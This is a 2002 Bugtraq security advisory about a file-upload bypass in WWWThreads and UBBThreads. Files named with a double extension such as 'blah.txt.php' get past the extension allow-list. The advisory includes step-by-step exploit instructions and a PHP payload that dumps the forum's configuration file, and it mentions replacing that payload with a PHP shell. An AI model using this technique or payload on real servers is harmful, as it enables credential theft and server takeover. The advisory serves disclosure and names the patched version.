[ WWWThreads, UBBThreads ] Security Hole in upload system

From: Root Extractor (condor@phreaker.net)
Date: 01/30/02 

Date: 30 Jan 2002 22:12:17 -0000
From: Root Extractor <condor@phreaker.net>
To: bugtraq@securityfocus.com
('binary' encoding is not supported, stored as-is)

[ WWWThreads, UBBThreads ] Security Hole in
upload system

Author: RootExtractor, CompuMe
condor@phreaker.net, compume2000@hotmail.com

I. Details
II. Vulnerable ver's
III. Example, Xploit
IV. Solution

Details :

..: config.inc.php :..
------------------------- snip ------------------------------

// $config['excludefiles']
= ".php,.asp,.js,.vbs,.sht,.htm";
   $config['allowfiles'] = ".zip,.txt,.gif,.jpg,.jpeg,.bmp";

------------------------- snip ------------------------------

 
that files that were not listed in the allow files could
still be uploaded. Seems you checked the extension
but if someone added an allowable extension first
before the bogus extension the file would upload.

vulnerable :
WWWThreads and UBBThreads 5.5 Dev11 and piror

not vulnerable :
UBBThreads 5.5

Example :
you allow the upload or .txt,.jpg,.bmp,.zip
all files that don't have those extensions should not
be uploaded
However if somebody changes the name of the file to
blah.txt.php the file will validate and upload......huh !

Xploit :
1) make new file $ touch blah.txt.php
2) edit it $ vi blah.txt.php (in this step, write a php
code, for example)

                    <?php
                            $readfile = join("", file
("../config.inc.php"));
                          print $readfile;
                    ?>

3) save & upload it
4) visit your blah file, now you can to see a config file
of your victim forum
5) i'm replaced readfile code by php shell file


Solution :
visit infopop.com and download ubbthreads 5.5
http://www.infopop.com/


Copyright 2002 recm security team
http://hop.to/condor

Relevant Pages

  • Re: How do I Save from MHTML .mht to HTML format only
    ... That will also add the .html extension ... You can choose the .html extension when you Publish to the ... The issue was the difference between html and htm on the index folder ... Double check that you did indeed upload to the ...
    (microsoft.public.publisher.webdesign)
  • Re: How do I Save from MHTML .mht to HTML format only
    ... The issue was the difference between html and htm on the index folder so I ... I also notice that your host says you have to use the .html extension for ... Double check that you did indeed upload to the ...
    (microsoft.public.publisher.webdesign)
  • Re: How do I Save from MHTML .mht to HTML format only
    ... The issue was the difference between html and htm on the index folder so I ... I also notice that your host says you have to use the .html extension for ... Double check that you did indeed upload to the ...
    (microsoft.public.publisher.webdesign)
  • Re: How do I Save from MHTML .mht to HTML format only
    ... Upload was successful. ... accept html files. ... direct your output to a folder on your hard drive where you can find it. ... seeing that extension. ...
    (microsoft.public.publisher.webdesign)
  • Re: How do I Save from MHTML .mht to HTML format only
    ... confirm that you uploaded your files to the correct folder on your host. ... I also notice that your host says you have to use the .html extension for ... Double check that you did indeed upload to the ... your images in your Pub file before you generate the html files/web pages. ...
    (microsoft.public.publisher.webdesign)